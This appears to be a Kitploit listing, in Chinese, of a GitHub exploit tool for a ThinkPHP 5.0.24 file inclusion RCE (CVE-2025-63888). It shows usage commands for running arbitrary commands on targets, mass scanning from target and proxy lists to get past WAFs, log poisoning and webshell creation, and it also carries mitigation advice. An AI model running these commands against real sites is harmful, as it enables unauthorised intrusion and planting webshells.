Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-63888-exploit — Security research tool for detecting and testing CVE-2025-63888 (ThinkPHP 5.0.24 File Inclusion RCE vulnerability) | Kitploit
工具/GitHubGitHub/an5i/cve-2025-63888-exploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队Payload 开发
GitHuban5i/cve-2025-63888-exploit

cve-2025-63888-exploit

Security research tool for detecting and testing CVE-2025-63888 (ThinkPHP 5.0.24 File Inclusion RCE vulnerability)

查看仓库
10429个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-63888 ThinkPHP 5.0.24 文件包含远程代码执行漏洞利用工具

一个用于检测和测试 ThinkPHP 5.0.24 中 CVE-2025-63888 漏洞的安全研究工具,该漏洞允许通过文件包含攻击实现远程代码执行。

⚠️ 免责声明

此工具仅用于授权的安全测试和教育目的。未经授权访问计算机系统是违法的。请仅在您拥有所有权或已获得明确书面许可的系统上使用此工具。

📋 概述

CVE-2025-63888 是 ThinkPHP 5.0.24 中的一个严重远程代码执行漏洞。该漏洞存在于 thinkphp/library/think/template/driver/File.php 文件的 read 函数中,攻击者可通过操控 view() 函数中的模板路径,利用文件包含攻击执行任意代码。

CVSS 评分: 9.8(严重)
受影响版本: ThinkPHP 5.0.24(精确版本)
漏洞文件: thinkphp/library/think/template/driver/File.php
漏洞函数: read() 方法

🔍 功能特性

  • 自动 ThinkPHP 检测: 识别 ThinkPHP 安装及版本
  • 漏洞测试: 测试 CVE-2025-63888 文件包含漏洞
  • 端点发现: 自动查找易受攻击的端点
  • 文件包含利用: 演示文件包含能力
  • 日志文件投毒: 尝试污染日志文件以实现远程代码执行
  • Webshell 创建: 通过文件包含创建 webshell
  • 命令执行: 执行任意命令(仅限授权测试)
  • 多线程支持: 并行扫描多个目标
  • 代理支持: 绕过 WAF/Cloudflare 限制
  • JSON 导出: 以 JSON 格式输出详细结果
  • 📦 安装

    前提条件

    • Python 3.6 或更高版本
    • pip(Python 包管理器)

    快速安装

    root@kitploit:~
    # 克隆仓库
    git clone https://github.com/AN5I/cve-2025-63888-exploit.git
    cd cve-2025-63888-exploit
    
    # 安装依赖
    pip install -r requirements.txt
    
    # 使脚本可执行(可选)
    chmod +x cve_2025_63888_exploit.py
    

    替代方案:直接下载

    root@kitploit:~
    # 下载脚本
    wget https://raw.githubusercontent.com/AN5I/cve-2025-63888-exploit/main/cve_2025_63888_exploit.py
    
    # 安装依赖
    pip install requests
    

    🚀 用法

    基本用法

    root@kitploit:~
    # 单个目标
    python3 cve_2025_63888_exploit.py -u http://target.com
    
    # 执行自定义命令
    python3 cve_2025_63888_exploit.py -u http://target.com -c "whoami"
    
    # 从文件读取多个目标
    python3 cve_2025_63888_exploit.py -f targets.txt -o results.json
    
    # 使用多线程加速扫描
    python3 cve_2025_63888_exploit.py -u http://target.com -t 5
    
    # 调试时输出详细信息
    python3 cve_2025_63888_exploit.py -u http://target.com -v
    

    使用代理

    root@kitploit:~
    # 单个代理
    python3 cve_2025_63888_exploit.py -u http://target.com --proxy http://proxy:port
    
    # 从文件读取多个代理
    python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt
    

    命令行选项

    root@kitploit:~
    -u, --url          目标 URL
    -f, --file         包含目标 URL 的文件(每行一个)
    -c, --command      要执行的命令(默认:id)
    -t, --threads      线程数(默认:1)
    -o, --output       输出文件(默认:uknf_results.json)
    -v, --verbose      启用详细日志
    --proxy            代理 URL(例如 http://127.0.0.1:8080)
    --proxy-list       包含代理 URL 的文件(每行一个)
    

    📊 输出

    脚本会生成一个包含详细结果的 JSON 文件:

    root@kitploit:~
    {
      "target": "http://target.com",
      "timestamp": "2025-11-20T15:05:35.763409",
      "vulnerable": true,
      "endpoint_found": true,
      "exploitation_successful": true,
      "command_executed": "id",
      "output": "uid=1000(user) gid=1000(user)...",
      "vulnerable_endpoint": "/index.php/index/index/view",
      "webshell_created": true,
      "webshell_path": "../../../runtime/log/2025/11/18.log"
    }
    

    🔬 工作原理

    1. 检测阶段: 扫描 ThinkPHP 框架的指示特征
    2. 版本检测: 尝试识别 ThinkPHP 版本(5.0.24)
    3. 漏洞测试: 测试文件包含漏洞
    4. 端点发现: 使用 view() 函数查找易受攻击的端点
    5. 利用: 通过文件包含演示远程代码执行能力

    🛡️ 缓解措施

    如果您正在使用 ThinkPHP 5.0.24:

    1. 立即升级:

      • 更新至 ThinkPHP 5.0.25+ 或更高版本
      • 或升级至 ThinkPHP 6.x/7.x
    2. 实施路径验证:

      • 在 view() 函数中添加严格的路径验证
      • 阻止目录遍历字符(../、..)
      • 将模板路径限制在白名单目录内
    3. 代码级修复:

      • 在处理前验证模板路径
      • 使用 realpath() 确保文件位于允许的目录内
      • 实现函数白名单

    📚 参考

    • CVE: CVE-2025-63888
    • GitHub Gist: CVE-2025-63888 详情
    • 语雀文章: 详细分析
    • ThinkPHP 手册: 官方文档

    📖 示例

    示例 1:单个目标扫描

    root@kitploit:~
    python3 cve_2025_63888_exploit.py -u https://example.com
    

    示例 2:多个目标并输出结果

    root@kitploit:~
    # 创建目标文件
    echo "https://target1.com" > targets.txt
    echo "https://target2.com" >> targets.txt
    
    # 运行扫描
    python3 cve_2025_63888_exploit.py -f targets.txt -o results.json
    

    示例 3:自定义命令执行

    root@kitploit:~
    python3 cve_2025_63888_exploit.py -u https://example.com -c "uname -a"
    

    示例 4:使用代理

    root@kitploit:~
    # 单个代理
    python3 cve_2025_63888_exploit.py -u https://example.com --proxy http://127.0.0.1:8080
    
    # 从文件读取多个代理
    echo "http://proxy1:8080" > proxies.txt
    echo "http://proxy2:8080" >> proxies.txt
    python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt
    

    🤝 贡献

    欢迎贡献!请随时提交 Pull Request。

    1. Fork 该仓库
    2. 创建您的功能分支(git checkout -b feature/AmazingFeature)
    3. 提交您的更改(git commit -m 'Add some AmazingFeature')
    4. 推送到分支(git push origin feature/AmazingFeature)
    5. 打开一个 Pull Request

    🐛 问题

    如果您遇到任何问题或有建议,请在 GitHub 上提交 issue。

    📝 许可证

    本项目采用 MIT 许可证授权 - 详见 LICENSE 文件。

    ⭐ Star 历史

    如果您觉得这个工具有用,请考虑在 GitHub 上给它一个 star!

    ⚖️ 法律声明

    此工具仅供教育和授权安全测试之用。作者对因使用本程序造成的任何滥用或损害概不负责。用户有责任在测试任何系统之前确保已获得适当授权。

    🙏 致谢

    • 原始漏洞报告者:Master-0-0
    • ThinkPHP 安全社区
    • 参与漏洞分析的安全研究人员

    💰 捐赠

    如果您觉得这个工具有用并希望支持该项目:

    比特币(BTC):

    root@kitploit:~
    bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv
    

    以太坊(ETH):

    root@kitploit:~
    0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7
    

    感谢您的支持!🙏

    下载工具